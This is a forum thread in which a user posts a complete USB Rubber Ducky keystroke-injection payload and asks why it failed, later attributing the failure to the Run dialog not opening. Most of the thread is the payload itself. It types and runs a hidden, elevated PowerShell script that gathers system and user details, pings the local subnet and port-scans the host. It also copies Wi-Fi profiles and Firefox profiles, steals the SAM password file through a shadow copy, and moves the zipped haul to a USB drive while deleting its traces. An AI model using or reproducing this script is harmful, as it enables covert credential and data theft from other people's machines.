0phoi5 Posted December 30, 2015 Share Posted December 30, 2015 (edited) Hi all, So I placed the following scipt on my Rubber Ducky, as inject.bin (next post). I used the Payload Generator located here. I chose all Recon apart from Screen Capture, and Reporting as 'Save Files to USB' Drive. I plugged it in to a Windows 7 machine, with the machine being on the Desktop and not locked. It proceeded to do nothing for a while, then it opened a random image file I happened to have on my Desktop and zoomed in and out on it a few times. Then silence. I plugged in my USB, named 'HELLOWORLD', gave it a few minutes and then unplugged. The USB had nothing on it, which wasn't right. It failed to gather any information at all. Is there a way I can debug the script? As in, get it to tell me exactly what it's doing, as it does it, on-screen? Or maybe you have an idea of what went wrong? *NOTE* This bit at the start... STRING powershell Start-Process notepad -Verb runAs ... didn't open notepad. Notepad failed to open at any point. Cheers. Edited December 30, 2015 by haze1434 Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted December 30, 2015 Author Share Posted December 30, 2015 DELAY 1200 GUI r DELAY 1200 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1200 ALT y DELAY 1200 ENTER ALT SPACE DELAY 1200 STRING m DELAY 1200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report +"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $u = 0 ENTER STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace) ENTER STRING $Report = $Report + '<div id=right><h3>USB Devices</h3><table>' ENTER STRING do { ENTER STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) ENTER STRING $Report = $Report + "<tr><td>Drive Name: </td><td> + " $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>STRING Write-Output $fullUSB" ENTER STRING $u ++ ENTER STRING } while ($u -lt $allUsb.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>' ENTER STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> ' ENTER STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' ENTER STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>Network Information</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1 ENTER STRING $IPAddr = $IP.IPAddress | Select-Object -Index 0 ENTER STRING $IPAddr -as [String] ENTER STRING $IPa = $IPAddr.Split('.') | Select -Index 0 ENTER STRING $IPb = $IPAddr.Split('.') | Select -Index 1 ENTER STRING $IPc = $IPAddr.Split('.') | Select -Index 2 ENTER STRING $IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.' ENTER STRING $Ping = new-object System.Net.Networkinformation.Ping ENTER STRING $ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address ENTER STRING $x = 0 ENTER STRING $Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>' ENTER STRING do { ENTER STRING $IPResults = $ScanResults | Select-Object -Index $x ENTER STRING $CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory ENTER STRING $CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname ENTER STRING $CurrIP = $IPResults.Address.IPAddressToString ENTER STRING $CurrOS = $CompInfo.SystemDirectory ENTER STRING $CurrName = $CompInfo.RegisteredUser ENTER STRING if ($CompInfo -ne $null){ ENTER STRING $Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>' ENTER STRING }else{ ENTER STRING $Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'} ENTER STRING $x ++ ENTER STRING } while ($x -lt $ScanResults.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Computer = $env:COMPUTERNAME ENTER STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080 ENTER STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>' ENTER STRING foreach ($PortNumber in $PortList) { ENTER STRING $PortCheck = New-Object Net.Sockets.TcpClient ENTER STRING $PortCheck.Connect($Computer, $PortNumber) ENTER STRING if ($PortCheck.Connected) { ENTER STRING $Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'} ENTER STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}} ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory ENTER STRING $srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces' ENTER STRING Copy-Item $srcDir $wlanSaveDir -Recurse ENTER STRING $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory ENTER STRING $fireDir = $userDir + '\AppData\Roaming\Mozilla\Firefox\Profiles' ENTER STRING $getFire = Get-Item -Path $fireDir -Exclude extensions ENTER STRING Copy-Item $getFire $fireSaveDir -Recurse ENTER STRING Start-Sleep -s 10 ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1200 STRING C:\Windows\config-d6899.ps1 ENTER DELAY 1200 ALT F4 DELAY 1200 GUI r DELAY 1200 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1200 ALT y DELAY 1200 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1200 STRING m DELAY 1200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1200 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER Quote Link to comment Share on other sites More sharing options...
Solution 0phoi5 Posted January 8, 2016 Author Solution Share Posted January 8, 2016 (edited) Ignore me, I was being a tit. Must have needed coffee on this day. GUI r didn't open RUN, which in turn meant notepad didn't load. Pretty simple really. Edited January 8, 2016 by haze1434 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.